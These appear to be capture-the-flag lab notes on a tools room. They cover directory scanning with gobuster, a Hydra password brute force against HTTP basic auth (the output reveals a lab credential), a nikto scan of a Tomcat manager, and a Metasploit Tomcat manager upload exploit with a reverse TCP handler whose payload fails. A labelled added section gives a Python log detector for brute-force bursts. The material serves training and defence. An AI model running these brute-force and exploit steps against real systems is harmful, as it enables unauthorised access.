gobuster dir --url 10.10.239.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

This room teaches tool usage, so just scan directly.
protected requires authentication.

hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.89.167 http-get /protected/
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-02 21:28:12
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.89.167:80/protected/
[80][http-get] host: 10.10.89.167 login: bob password: bubbles
[STATUS] attack finished for 10.10.89.167 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-02 21:28:15
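
From the defender's side, the Hydra run above appears in the web server's access log as a burst of 401 responses on /protected/ followed by a 200. This is an added example, not part of the original notes, that flags that pattern; the Common Log Format lines, the threshold, the window and the second client IP are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in Common Log Format (not taken from the original notes).
SAMPLE_LOG = "\n".join(
    [f'10.17.6.173 - bob [02/Mar/2024:21:28:{12 + i // 8:02d} +0000] "GET /protected/ HTTP/1.1" 401 381'
     for i in range(20)]
    + ['10.17.6.173 - bob [02/Mar/2024:21:28:15 +0000] "GET /protected/ HTTP/1.1" 200 1024',
       '10.17.6.50 - alice [02/Mar/2024:21:28:13 +0000] "GET /protected/ HTTP/1.1" 401 381',
       '10.17.6.50 - alice [02/Mar/2024:21:29:40 +0000] "GET /protected/ HTTP/1.1" 200 1024']
)

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?:\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def detect_basic_auth_bruteforce(log_text, threshold=10, window=timedelta(seconds=60)):
    """Flag (ip, path) pairs with >= threshold 401s inside `window` and record
    the user of the first 200 that follows (credential likely guessed)."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not Common Log Format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((ts, m["ip"], m["path"], m["user"], int(m["status"])))
    events.sort(key=lambda e: e[0])  # stable sort keeps same-second order

    failures = defaultdict(list)  # (ip, path) -> timestamps of recent 401s
    alerts = {}                   # (ip, path) -> alert record
    for ts, ip, path, user, status in events:
        key = (ip, path)
        if status == 401:
            recent = [t for t in failures[key] if ts - t <= window] + [ts]
            failures[key] = recent
            if len(recent) >= threshold and key not in alerts:
                alerts[key] = {"ip": ip, "path": path, "first_alert": ts,
                               "compromised_user": None}
        elif status == 200 and key in alerts and alerts[key]["compromised_user"] is None:
            alerts[key]["compromised_user"] = user  # success right after a failure burst
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_basic_auth_bruteforce(SAMPLE_LOG):
        print(alert)
```

The single failed login from the second client stays below the threshold, so an ordinary mistyped password does not raise an alert.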

http://10.10.89.167:1234/ has a Tomcat service, and the version number is leaked.
nikto -host http://10.10.89.167:1234/manager/html -id bob:bubbles
Emmm, what use is this?

msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 10.17.6.173:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying UgkSJ...
[*] Executing UgkSJ...
[-] Exploit aborted due to failure: unknown: Failed to execute the payload
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/tomcat_mgr_upload) >

Why?

Is it a network issue? The target machine started up right away.